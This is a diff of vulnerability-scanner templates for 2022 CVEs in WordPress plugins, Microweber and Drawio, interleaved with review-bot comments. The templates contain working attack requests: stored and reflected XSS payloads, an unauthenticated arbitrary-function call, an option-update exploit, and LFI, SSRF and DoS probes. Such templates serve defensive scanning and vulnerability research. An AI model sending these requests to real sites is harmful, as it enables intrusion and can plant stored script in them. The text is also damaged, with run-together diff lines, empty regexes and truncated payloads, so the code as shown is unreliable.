@@ -14,8 +17,17 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0599 cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated -requests: + epss-score: 0.00106 + epss-percentile: 0.4302 + cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: mapping_multiple_urls_redirect_same_page_project + product: mapping_multiple_urls_redirect_same_page + framework: wordpress + tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan + +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -26,16 +38,17 @@ requests: - | GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="> HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - req-condition: true + matchers-condition: and matchers: - - type: word - part: body - words: - - 'id="mmursp_id" value="\">" />' - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' condition: and + + - type: word + part: body + words: + - 'id="mmursp_id" value="\">" />' +# digest: 490a00463044022023cf3167ab8c79a8bd8a6ae4b1106225ec993b730d3359c06c2270b5f9842424022079d6288d5a9e4051a6a65119b847d1635a1456906a05e397bcc680d2478c7328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0921.yaml b/poc/cve/CVE-2022-0921.yaml new file mode 100644 index 0000000000..cd4e13baa8 --- /dev/null +++ b/poc/cve/CVE-2022-0921.yaml 
@@ -0,0 +1,57 @@ +id: CVE-2022-0954 + +info: + name: Microweber - Cross-site Scripting + author: amit-jd + severity: medium + description: | + Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. + reference: + - https://github.com/advisories/GHSA-8c76-mxv5-w4g8 + - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/ + - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0954 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-0954 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2022,xss,microweber + +requests: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + - | + POST /api/save_option HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}/admin/view:shop/action:options + + option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother + + - | + POST /module/ HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}/admin/view:shop/action:options + + module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B + + cookie-reuse: true + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2,"true")' + - contains(body_3,'\">\" placeholder=\"Use default') + - 'contains(all_headers_3,"text/html")' + - 'status_code_3==200' + condition: and 
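Review bot: This file is added as `poc/cve/CVE-2022-0921.yaml`, but its `id`, `cve-id` and NVD reference all say CVE-2022-0954, so results are reported under an identifier that does not match the path; rename the file to `CVE-2022-0954.yaml` or correct the metadata, whichever CVE is intended. Separately, the second request saves an `alert(document.domain)` payload into the shop's `checkout_url` option and nothing in the template restores it, so scanning a vulnerable site leaves stored script behind for the next admin who opens that settings page. The tags should warn operators, e.g. `tags: cve,cve2022,xss,microweber,authenticated,intrusive`, and the description should say the option must be reset after a positive result. CVE-2022-0952.yaml later in this patch appears to have the same property, since its request body `{"users_can_register":"0"}` is posted to an option-update endpoint.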
diff --git a/poc/cve/CVE-2022-0952.yaml b/poc/cve/CVE-2022-0952.yaml index 3e068044db..02a62592d2 100644 --- a/poc/cve/CVE-2022-0952.yaml +++ b/poc/cve/CVE-2022-0952.yaml @@ -1,10 +1,13 @@ id: CVE-2022-0952 + info: - name: Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update + name: WordPress Sitemap by click5 <1.0.36 - Missing Authorization author: random-robbie severity: high description: | - The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin + WordPress Sitemap by click5 plugin before 1.0.36 is susceptible to missing authorization. The plugin does not have authorization or CSRF checks when updating options via a REST endpoint and does not ensure that the option to be updated belongs to the plugin. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Sitemap plugin by click5 (1.0.36 or higher) to fix the missing authorization issue. reference: - https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b - https://nvd.nist.gov/vuln/detail/CVE-2022-0952 @@ -12,11 +15,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0952 - cwe-id: CWE-862 + cwe-id: CWE-352 + epss-score: 0.06923 + epss-percentile: 0.93221 + cpe: cpe:2.3:a:sitemap_project:sitemap:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2022,wordpress,wp,wp-plugin,sitemap -requests: + verified: true + max-request: 3 + vendor: sitemap_project + product: sitemap + framework: wordpress + tags: wp,wp-plugin,sitemap,wpscan,cve,cve2022,wordpress + +http: - raw: - | POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 
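Review bot: The classification hunk changes `cwe-id` from CWE-862 to CWE-352, while the same commit renames the template to "Missing Authorization", which is what CWE-862 denotes; CWE-352 is cross-site request forgery. The description names both a missing authorization check and a missing CSRF check, so either list both, `cwe-id: CWE-352,CWE-862` (the form CVE-2022-1020.yaml uses in this patch), or keep the name and the CWE aligned. Anyone triaging findings by CWE would otherwise file an unauthenticated option update as a CSRF issue and rank it accordingly.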
@@ -36,12 +47,13 @@ requests: Content-type: application/json;charset=UTF-8 {"users_can_register":"0"} - req-condition: true + matchers: - type: dsl dsl: - - 'contains(all_headers, "application/json")' + - 'contains(header, "application/json")' - "status_code == 200" - "contains(body_1, 'users_can_register')" - "contains(body_2, 'default_role')" condition: and +# digest: 4b0a00483046022100eb97a997f88c9c9e75895f6923eb74d9357d6c183d4ed7508c18992426d3eafb022100f1b83688c7f812e45069be90d6b8f95c4b1e604f1665b10548b4365bc31171fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0968.yaml b/poc/cve/CVE-2022-0968.yaml index 646a84a911..2c9a1e47da 100644 --- a/poc/cve/CVE-2022-0968.yaml +++ b/poc/cve/CVE-2022-0968.yaml 
@@ -1,35 +1,24 @@ id: CVE-2022-0968 - info: - name: Microweber <1.2.12 - Integer Overflow + name: Microweber < 1.2.12 - Integer Overflow (DOS) author: amit-jd severity: medium description: | - Microweber before 1.2.12 is susceptible to integer overflow. The application allows large characters to insert in the input field 'first & last name,' which can allow an attacker to cause a denial of service via a crafted HTTP request. - remediation: First name and last name input should be limited to 50 characters or maximum 100 characters. + The microweber application allows large characters to insert in the input field "first & last name" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. The first name & last name input should be limited to 50 characters or max 100 characters. reference: - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/ - https://github.com/advisories/GHSA-5fxv-xx5p-g2fv - - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e - https://nvd.nist.gov/vuln/detail/CVE-2022-0968 - - https://github.com/microweber/microweber/commit/80e39084729a57dfe749626c3b9d35247a14c49e + - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H cvss-score: 5.5 cve-id: CVE-2022-0968 cwe-id: CWE-190 - epss-score: 0.00076 - epss-percentile: 0.31493 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* - metadata: - max-request: 3 - vendor: microweber - product: microweber - tags: cve,cve2022,overflow,microweber,cms,huntr + tags: cve,cve2022,overflow,microweber,cms variables: payload: '{{repeat("A", 600)}}' - -http: +requests: - raw: - | POST /api/user_login HTTP/1.1 
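Review bot: The new side of CVE-2022-0968.yaml reverts to the legacy template layout: `http:` becomes `requests:`, the `remediation`, `metadata`, EPSS and CPE fields are dropped, and the next hunk brings back `req-condition`, `cookie-reuse` and `all_headers_3` and removes the `# digest:` signature line. Other files in this patch move the opposite way (CVE-2022-0594, -0599, -0952, -1392, -1906), so the automated import looks like it is overwriting newer copies with older ones; the same regression is visible in CVE-2022-1020, -1221, -1597, -1713, -1815, -1904, -1937 and -21705. For consumers of the corpus the loss of `remediation` and of the signature line matters most, because it removes the fix guidance and what is presumably the integrity check on the template body. The hunk also adds `https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e` although the same URL with a trailing slash is already the first reference.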
@@ -46,37 +35,34 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key= - + req-condition: true + cookie-reuse: true matchers: - type: dsl dsl: - contains(body_3,'\"first_name\":\"{{payload}}\"') - 'status_code_3==200' - - 'contains(header_3,"application/json")' + - 'contains(all_headers_3,"application/json")' condition: and - extractors: - type: regex + part: body name: form_token + internal: true group: 1 regex: - '' - internal: true - part: body - - type: regex + part: body name: user + internal: true group: 1 regex: - '' - internal: true - part: body - - type: regex + part: body name: email + internal: true group: 1 regex: - '' - internal: true - part: body -# digest: 4a0a00473045022100ade00a84685d717e711f531bf52de45ef39eb16a7683f3f91546e1915441e5930220560dc08f30548100959ed644755699a257f5ea2f1db61f4a969ec8d3d47e2b19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1020.yaml b/poc/cve/CVE-2022-1020.yaml index 05f1f07c86..32720cd261 100644 --- a/poc/cve/CVE-2022-1020.yaml +++ b/poc/cve/CVE-2022-1020.yaml 
@@ -1,12 +1,9 @@ id: CVE-2022-1020 - info: name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call author: Akincibor severity: critical description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. - remediation: | - Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5 - https://nvd.nist.gov/vuln/detail/CVE-2022-1020 @@ -14,18 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1020 - cwe-id: CWE-352 - epss-score: 0.01203 - epss-percentile: 0.83615 - cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: codeastrology - product: woo_product_table - framework: wordpress - tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth - -http: + cwe-id: CWE-352,CWE-862 + tags: wp,wp-plugin,wordpress,cve,cve2022,unauth +requests: - raw: - | POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 @@ -33,7 +21,6 @@ http: Content-Type: application/x-www-form-urlencoded option_key=a&perpose=update&callback=phpinfo - matchers-condition: and matchers: - type: word 
@@ -41,15 +28,14 @@ http: - "PHP Extension" - "PHP Version" condition: and - - type: status status: - 200 - extractors: - type: regex + part: body group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' - part: body -# digest: 4a0a00473045022100a8a05f81974b59a392965d355bd6581ade66102441b9d375bd8b588a3363bf6d02207b829c1a3982300f49739287c5dd740022a1b5b8b9d0df6f6b5bfcfa00e70632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/05/18 diff --git a/poc/cve/CVE-2022-1221.yaml b/poc/cve/CVE-2022-1221.yaml index 1a48ec8daf..ca0ab04ccb 100644 --- a/poc/cve/CVE-2022-1221.yaml +++ b/poc/cve/CVE-2022-1221.yaml 
@@ -1,54 +1,37 @@ id: CVE-2022-1221 - info: - name: WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting + name: Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting author: veshraj severity: medium description: | - Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes. - remediation: | - Update to the latest version of the WordPress Gwyn's Imagemap Selector plugin (0.3.3) or apply the vendor-supplied patch to fix the vulnerability. + The Gwyn's Imagemap Selector Wordpresss plugin does not sanitize the id and class parameters before returning them back in attributes, leading to a Reflected Cross-Site Scripting. reference: - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1221 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1221 cwe-id: CWE-79 - epss-score: 0.00141 - epss-percentile: 0.49726 - cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 2 - vendor: gwyn\'s_imagemap_selector_project - product: gwyn\'s_imagemap_selector - framework: wordpress - tags: cve2022,wpscan,xss,wordpress,wp-plugin,wp,cve - -http: + verified: "true" + tags: xss,wordpress,wp-plugin,wp,cve,cve2022 +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - stop-at-first-match: true - matchers-condition: and matchers: - type: word part: body words: - " popup-" - - type: word 
part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a00483046022100d0445f901c55d0117cde9f060574efc03ac0a3ca63ca2d70323cc432b874241e022100fec4a2a786a10f32a1741d9fe1af500df38dadd43d211550cfe38c7c7cb78ec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1392.yaml b/poc/cve/CVE-2022-1392.yaml index 1cfaf712bd..3257dfaf96 100644 --- a/poc/cve/CVE-2022-1392.yaml +++ b/poc/cve/CVE-2022-1392.yaml @@ -1,9 +1,12 @@ id: CVE-2022-1392 + info: name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion author: Veshraj severity: high description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. + remediation: | + Upgrade to the latest version of WordPress Videos sync PDF plugin (>=1.7.5) or apply the vendor-provided patch to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 - https://packetstormsecurity.com/files/166534/ @@ -12,13 +15,23 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1392 + cwe-id: CWE-22 + epss-score: 0.0183 + epss-percentile: 0.86875 + cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* metadata: verified: true - tags: cve,cve2022,lfi,wp-plugin,wp,wordpress,unauth -requests: + max-request: 1 + vendor: commoninja + product: videos_sync_pdf + framework: wordpress + tags: lfi,wp-plugin,unauth,wpscan,cve,cve2022,packetstorm,wp,wordpress + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" + matchers-condition: and matchers: - type: word 
@@ -27,8 +40,8 @@ requests: - "failed to open stream: No such file or directory" - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/06/29 +# digest: 490a0046304402205f67080308c217d44c3372ef44fb06972583061e1d54b80e448c2b5fef5953b1022065343551ec8d234bf694944edd3f9813394d03a6af2123c521c2fdd63eb98623:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1597.yaml b/poc/cve/CVE-2022-1597.yaml index 3c9b07db3c..a419e27878 100644 --- a/poc/cve/CVE-2022-1597.yaml +++ b/poc/cve/CVE-2022-1597.yaml 
@@ -1,38 +1,29 @@ id: CVE-2022-1597 - info: - name: WordPress WPQA <5.4 - Cross-Site Scripting + name: WPQA < 5.4 - Reflected Cross-Site Scripting author: veshraj severity: medium description: | - WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form. - remediation: | - Upgrade WordPress WPQA to version 5.4 or later, which includes proper input sanitization to mitigate this vulnerability. + The plugin, used as a companion for the Discy and Himer themes, + does not sanitise and escape a parameter on its reset password + form which makes it possible to perform reflected XSS. reference: - https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e - - https://nvd.nist.gov/vuln/detail/CVE-2022-1597 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1597 cwe-id: CWE-79 - epss-score: 0.0025 - epss-percentile: 0.62763 - cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 2 - vendor: 2code - product: wpqa_builder - framework: wordpress - google-query: inurl:/wp-content/plugins/wpqa - tags: wpscan,xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa + google-dork: inurl:/wp-content/plugins/wpqa + verified: "true" + tags: xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa variables: user: "{{to_lower(rand_base(5))}}" pass: "{{user}}{{to_lower(rand_base(3))}}" redirect_to: '">' - -http: +requests: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 @@ -48,7 +39,6 @@ http: Content-Type: application/x-www-form-urlencoded user_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}} - matchers-condition: and matchers: - type: word 
@@ -57,13 +47,10 @@ http: - '{{redirect_to}}' - '"success":1' condition: and - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a00483046022100a5419ca2df78e712c32c8113f2e791f2260bee01da8917c3c2d24c2d9b9be022022100e43351469d784605a404281d2054a5b85fc43edb76778bedb508728bc967175d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1713.yaml b/poc/cve/CVE-2022-1713.yaml index 0aeff612ed..020db3ac09 100644 --- a/poc/cve/CVE-2022-1713.yaml +++ b/poc/cve/CVE-2022-1713.yaml @@ -1,13 +1,10 @@ id: CVE-2022-1713 - info: name: Drawio <18.0.4 - Server-Side Request Forgery author: pikpikcu severity: high description: | Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information. - remediation: | - Upgrade Drawio to version 18.0.4 or later to mitigate the SSRF vulnerability. reference: - https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11 - https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee 
@@ -17,32 +14,24 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1713 cwe-id: CWE-918 - epss-score: 0.01291 - epss-percentile: 0.84282 - cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 - vendor: diagrams - product: drawio shodan-query: http.title:"Flowchart Maker" - tags: drawio,ssrf,oss,huntr,cve,cve2022 - -http: + tags: cve,cve2022,drawio,ssrf,oss +requests: - raw: - | GET /proxy?url=http%3a//0:8080/ HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word part: body words: - "Flowchart Maker & Online Diagram Software" - - type: word part: header words: - "application/octet-stream" -# digest: 4a0a004730450220340503229df1c391b0a3802f5fed307ea9a4341970e8fae14d6f08c6705faf5c022100865d51f43b0937a1ae282797d67abeba4a89355d9532f4f74ff10f841b44c78c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/29 diff --git a/poc/cve/CVE-2022-1815.yaml b/poc/cve/CVE-2022-1815.yaml index 84ecd0837f..62e23a8e4b 100644 --- a/poc/cve/CVE-2022-1815.yaml +++ b/poc/cve/CVE-2022-1815.yaml 
@@ -1,43 +1,31 @@ id: CVE-2022-1815 - info: - name: Drawio <18.1.2 - Server-Side Request Forgery + name: Drawio < 18.1.2 - Server Side Request Forgery author: amit-jd severity: high description: | - Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. - remediation: | - Upgrade Drawio to version 18.1.2 or later to mitigate the SSRF vulnerability. + SSRF in /service endpoint in jgraph/drawio prior to 18.1.2. Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2. reference: - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1815 - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f - https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1815 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1815 - cwe-id: CWE-918,CWE-200 - epss-score: 0.00928 - epss-percentile: 0.81192 - cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* + cwe-id: CWE-918 metadata: - verified: true - max-request: 1 - vendor: diagrams - product: drawio - tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph - -http: + verified: "true" + tags: cve,cve2022,drawio,ssrf,oast,oss,jgraph +requests: - raw: - | GET /service/0/test.oast.me HTTP/2 Host: {{Hostname}} - matchers: - type: dsl dsl: - "contains(body, 'Interactsh Server')" - status_code == 200 condition: and -# digest: 4b0a00483046022100d4ba06ac28c9b4f15664de0f9a92cbf82be72e59f1ee5f7cd05ee7bfb1fa0c5302210095c69ffd14c4dbce38eb99024acf9531a54794807648fbc8fb2df05ade57dec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
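Review bot: The request this hunk keeps hard-codes the public host `test.oast.me` and the matcher looks for the string `Interactsh Server` in the body, so a positive depends on that third-party host staying reachable and continuing to serve that banner; if either changes, the check silently reports nothing on a vulnerable instance. A per-scan callback removes the fixed host and string and lets an operator point the scan at their own collaborator server, e.g. path `/service/0/{{interactsh-url}}` with a matcher of `type: word`, `part: interactsh_protocol`, `words: ["http"]`. Whether the `/service` endpoint accepts that hostname form should be confirmed on a test instance before replacing the existing matcher.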
diff --git a/poc/cve/CVE-2022-1904.yaml b/poc/cve/CVE-2022-1904.yaml index ff73e1073d..44550af381 100644 --- a/poc/cve/CVE-2022-1904.yaml +++ b/poc/cve/CVE-2022-1904.yaml 
@@ -1,50 +1,35 @@ id: CVE-2022-1904 - info: - name: WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting + name: Easy Pricing Tables < 3.2.1 - Reflected Cross-Site-Scripting author: Akincibor severity: medium description: | - WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled. - remediation: | - Update to the latest version of WordPress Easy Pricing Tables plugin (3.2.1) to mitigate the vulnerability. + The plugin does not sanitize and escape parameter before reflecting it back in a page available to any user (both authenticated and unauthenticated) when a specific setting is enabled, leading to a reflected cross-site scripting. reference: - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b - - https://nvd.nist.gov/vuln/detail/CVE-2022-1904 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1904 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1904 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40336 - cpe: cpe:2.3:a:fatcatapps:easy_pricing_tables:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 1 - vendor: fatcatapps - product: easy_pricing_tables - framework: wordpress - tags: wp,wordpress,wpscan,cve,cve2022,wp-plugin,xss - -http: + verified: "true" + tags: cve,cve2022,wp-plugin,xss,wp,wordpress +requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=' - matchers-condition: and matchers: - type: word part: body words: - ' - Color' - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 
490a0046304402200dfa19a5a7a0ebd87e3b030d193dbd46f4352c5740c0207700c8da80e607be6a022024db645700b2359d6a35eecb0a92c6a040a0e5d1640dddd7ee34034d242c4b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1906.yaml b/poc/cve/CVE-2022-1906.yaml index 0de7988bdc..e16db83122 100644 --- a/poc/cve/CVE-2022-1906.yaml +++ b/poc/cve/CVE-2022-1906.yaml 
@@ -1,28 +1,39 @@ id: CVE-2022-1906 + info: - name: Copyright Proof <= 4.16 - Reflected Cross-Site-Scripting + name: WordPress Copyright Proof <=4.16 - Cross-Site-Scripting author: random-robbie severity: medium description: | - The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting when a specific setting is enabled. + WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled. + remediation: | + Update to the latest version of WordPress Copyright Proof plugin (>=4.17) which includes proper input sanitization and validation. reference: - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338 - https://nvd.nist.gov/vuln/detail/CVE-2022-1906 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1906 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1906 cwe-id: CWE-79 + epss-score: 0.00097 + epss-percentile: 0.40336 + cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* metadata: - google-dork: inurl:/wp-content/plugins/digiproveblog - verified: "true" - tags: cve,cve2022,wordpress,xss,wp-plugin,wp -requests: + verified: true + max-request: 1 + vendor: digiprove + product: copyright_proof + framework: wordpress + google-query: inurl:/wp-content/plugins/digiproveblog + tags: wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022 + +http: - raw: - | GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word 
@@ -30,10 +41,13 @@ requests: words: - "got message " condition: and + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 490a004630440220539afbbb7614f275ea3ae0955d4842736b84b10b31a701ac19280010ee2b325502207c3678066304e38f0cf78ae062687de6aa22f6debfdb08a174a3e42831626f0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1937.yaml b/poc/cve/CVE-2022-1937.yaml index f1c8faecc8..8d81785de7 100644 --- a/poc/cve/CVE-2022-1937.yaml +++ b/poc/cve/CVE-2022-1937.yaml @@ -1,13 +1,10 @@ id: CVE-2022-1937 - info: - name: WordPress Awin Data Feed <=1.6 - Cross-Site Scripting + name: Awin Data Feed <= 1.6 - Reflected Cross-Site Scripting author: Akincibor,DhiyaneshDK severity: medium description: | - WordPress Awin Data Feed plugin 1.6 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action, available to both unauthenticated and authenticated users. - remediation: | - Update to the latest version of the WordPress Awin Data Feed plugin (1.6 or higher) to mitigate this vulnerability. + The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting. reference: - https://wpscan.com/vulnerability/eb40ea5d-a463-4947-9a40-d55911ff50e9 - https://nvd.nist.gov/vuln/detail/CVE-2022-1937 @@ -16,18 +13,10 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1937 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40336 - cpe: 